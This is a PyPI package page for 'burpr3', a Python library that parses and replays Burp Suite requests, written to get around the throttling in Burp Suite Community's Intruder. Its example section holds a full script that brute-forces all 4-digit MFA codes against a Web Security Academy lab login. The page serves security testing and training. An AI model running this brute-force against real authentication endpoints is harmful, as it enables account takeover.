burpr3


Nameburpr3 JSON
Version 0.0.2 PyPI version JSON
download
home_pagehttps://github.com/krystianbajno/burpr
SummaryA Burp Suite request parser, used for aid in assessing application security functionality.
upload_time2023-09-09 14:25:26
maintainer
docs_urlNone
authorKrystian Bajno
requires_python
licenseMIT
keywords burp suite burpsuite request parser
VCS
bugtrack_url
requirements No requirements were recorded.
Travis-CI No Travis.
coveralls test coverage No coveralls. 
            # What is it
A Burp Suite request parser, used for aid in assessing application security functionality.

# Why I wrote it
To bypass the throttling 'Burp Suite Community' does to the intruder.

# Usage
Use burpr.py module to parse the Burp Suite copied request. Then use the created object to extract headers and body.

Supports parsing requests as strings and as .txt files.

```python
import burpr

# Load from string
req = burpr.parse_string(req_string)

# Load from file
req = burpr.parse_file(req_file_path)

# clone the request
req_clone = burpr.clone(req)

# change protocol to http1.1
req_clone.set_protocol(burpr.protocols.HTTP1_1)

# change transport to http
req_clone.set_transport(burpr.transports.HTTP)

# modify the header
req_clone.set_header("Cookie", "session=modified_session_cookie")

# modify the parameter
req_clone.set_parameter("post-param", "AAABBBCCC")

# remove parameter
req_clone.remove_parameter("post-param")

# remove header
req_clone.remove_header("Cookie")

# adjust Content-Length for parameter change
burpr.prepare(req_clone)

client = httpx.Client(http2=True)
res = client.post(req.url, headers=req.headers, data=req.body)
```

# Examples
## Brute force broken MFA
```python
import burpr
import httpx
import itertools

burp_request = r"""POST /login2 HTTP/2
Host: xxxx.web-security-academy.net
Cookie: verify=carlos; session=xxxx
Content-Length: 13
Cache-Control: max-age=0
Sec-Ch-Ua: 
Sec-Ch-Ua-Mobile: ?0
Sec-Ch-Ua-Platform: ""
Upgrade-Insecure-Requests: 1
Origin: https://xxxx.web-security-academy.net
Content-Type: application/x-www-form-urlencoded
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/116.0.5845.111 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Sec-Fetch-Site: same-origin
Sec-Fetch-Mode: navigate
Sec-Fetch-User: ?1
Sec-Fetch-Dest: document
Referer: https://xxxx.web-security-academy.net/login2
Accept-Encoding: gzip, deflate
Accept-Language: en-US,en;q=0.9

mfa-code=4321
"""

def generate_pin_numbers():
  return [''.join(list([str(digit) for digit in permutation])) 
          for permutation in itertools.product(list(range(0, 10)), repeat=4)]

def brute_force_broken_mfa():
  # Parse request from string
  req = burpr.parse_string(burp_request)

  # Create http client and check the protocol used
  client = httpx.Client(http2=req.is_http2)

  for pin in generate_pin_numbers():
    # Modify the mfa-code parameter
    req.set_parameter("mfa-code", pin)

    # Send the request
    res = client.post(req.url, headers=req.headers, data=req.body)

    print(res.status_code, pin)
    
    if (res.status_code != 200):
      break

brute_force_broken_mfa()
```

Raw data

            {
    "_id": null,
    "home_page": "https://github.com/krystianbajno/burpr",
    "name": "burpr3",
    "maintainer": "",
    "docs_url": null,
    "requires_python": "",
    "maintainer_email": "",
    "keywords": "burp suite burpsuite request parser",
    "author": "Krystian Bajno",
    "author_email": "krystian.bajno@gmail.com",
    "download_url": "https://files.pythonhosted.org/packages/bf/bc/8583b996b60a7a1e1d53f2207b00d3b6206e18d6fcf6b6859b2f5f5cb59a/burpr3-0.0.2.tar.gz",
    "platform": null,
    "description": "# What is it\r\nA Burp Suite request parser, used for aid in assessing application security functionality.\r\n\r\n# Why I wrote it\r\nTo bypass the throttling 'Burp Suite Community' does to the intruder.\r\n\r\n# Usage\r\nUse burpr.py module to parse the Burp Suite copied request. Then use the created object to extract headers and body.\r\n\r\nSupports parsing requests as strings and as .txt files.\r\n\r\n```python\r\nimport burpr\r\n\r\n# Load from string\r\nreq = burpr.parse_string(req_string)\r\n\r\n# Load from file\r\nreq = burpr.parse_file(req_file_path)\r\n\r\n# clone the request\r\nreq_clone = burpr.clone(req)\r\n\r\n# change protocol to http1.1\r\nreq_clone.set_protocol(burpr.protocols.HTTP1_1)\r\n\r\n# change transport to http\r\nreq_clone.set_transport(burpr.transports.HTTP)\r\n\r\n# modify the header\r\nreq_clone.set_header(\"Cookie\", \"session=modified_session_cookie\")\r\n\r\n# modify the parameter\r\nreq_clone.set_parameter(\"post-param\", \"AAABBBCCC\")\r\n\r\n# remove parameter\r\nreq_clone.remove_parameter(\"post-param\")\r\n\r\n# remove header\r\nreq_clone.remove_header(\"Cookie\")\r\n\r\n# adjust Content-Length for parameter change\r\nburpr.prepare(req_clone)\r\n\r\nclient = httpx.Client(http2=True)\r\nres = client.post(req.url, headers=req.headers, data=req.body)\r\n```\r\n\r\n# Examples\r\n## Brute force broken MFA\r\n```python\r\nimport burpr\r\nimport httpx\r\nimport itertools\r\n\r\nburp_request = r\"\"\"POST /login2 HTTP/2\r\nHost: xxxx.web-security-academy.net\r\nCookie: verify=carlos; session=xxxx\r\nContent-Length: 13\r\nCache-Control: max-age=0\r\nSec-Ch-Ua: \r\nSec-Ch-Ua-Mobile: ?0\r\nSec-Ch-Ua-Platform: \"\"\r\nUpgrade-Insecure-Requests: 1\r\nOrigin: https://xxxx.web-security-academy.net\r\nContent-Type: application/x-www-form-urlencoded\r\nUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/116.0.5845.111 Safari/537.36\r\nAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7\r\nSec-Fetch-Site: same-origin\r\nSec-Fetch-Mode: navigate\r\nSec-Fetch-User: ?1\r\nSec-Fetch-Dest: document\r\nReferer: https://xxxx.web-security-academy.net/login2\r\nAccept-Encoding: gzip, deflate\r\nAccept-Language: en-US,en;q=0.9\r\n\r\nmfa-code=4321\r\n\"\"\"\r\n\r\ndef generate_pin_numbers():\r\n  return [''.join(list([str(digit) for digit in permutation])) \r\n          for permutation in itertools.product(list(range(0, 10)), repeat=4)]\r\n\r\ndef brute_force_broken_mfa():\r\n  # Parse request from string\r\n  req = burpr.parse_string(burp_request)\r\n\r\n  # Create http client and check the protocol used\r\n  client = httpx.Client(http2=req.is_http2)\r\n\r\n  for pin in generate_pin_numbers():\r\n    # Modify the mfa-code parameter\r\n    req.set_parameter(\"mfa-code\", pin)\r\n\r\n    # Send the request\r\n    res = client.post(req.url, headers=req.headers, data=req.body)\r\n\r\n    print(res.status_code, pin)\r\n    \r\n    if (res.status_code != 200):\r\n      break\r\n\r\nbrute_force_broken_mfa()\r\n```\r\n",
    "bugtrack_url": null,
    "license": "MIT",
    "summary": "A Burp Suite request parser, used for aid in assessing application security functionality.",
    "version": "0.0.2",
    "project_urls": {
        "Homepage": "https://github.com/krystianbajno/burpr"
    },
    "split_keywords": [
        "burp",
        "suite",
        "burpsuite",
        "request",
        "parser"
    ],
    "urls": [
        {
            "comment_text": "",
            "digests": {
                "blake2b_256": "bfbc8583b996b60a7a1e1d53f2207b00d3b6206e18d6fcf6b6859b2f5f5cb59a",
                "md5": "981a46814bff79b9f7f738ab803f3068",
                "sha256": "0f58abbf6614ace6c6bda6c5818845ed0b5a3d8204175c83b01e9d6b881e9443"
            },
            "downloads": -1,
            "filename": "burpr3-0.0.2.tar.gz",
            "has_sig": false,
            "md5_digest": "981a46814bff79b9f7f738ab803f3068",
            "packagetype": "sdist",
            "python_version": "source",
            "requires_python": null,
            "size": 4668,
            "upload_time": "2023-09-09T14:25:26",
            "upload_time_iso_8601": "2023-09-09T14:25:26.638626Z",
            "url": "https://files.pythonhosted.org/packages/bf/bc/8583b996b60a7a1e1d53f2207b00d3b6206e18d6fcf6b6859b2f5f5cb59a/burpr3-0.0.2.tar.gz",
            "yanked": false,
            "yanked_reason": null
        }
    ],
    "upload_time": "2023-09-09 14:25:26",
    "github": true,
    "gitlab": false,
    "bitbucket": false,
    "codeberg": false,
    "github_user": "krystianbajno",
    "github_project": "burpr",
    "travis_ci": false,
    "coveralls": false,
    "github_actions": false,
    "requirements": [],
    "lcname": "burpr3"
}
Krystian Bajno
Elapsed time: 0.11098s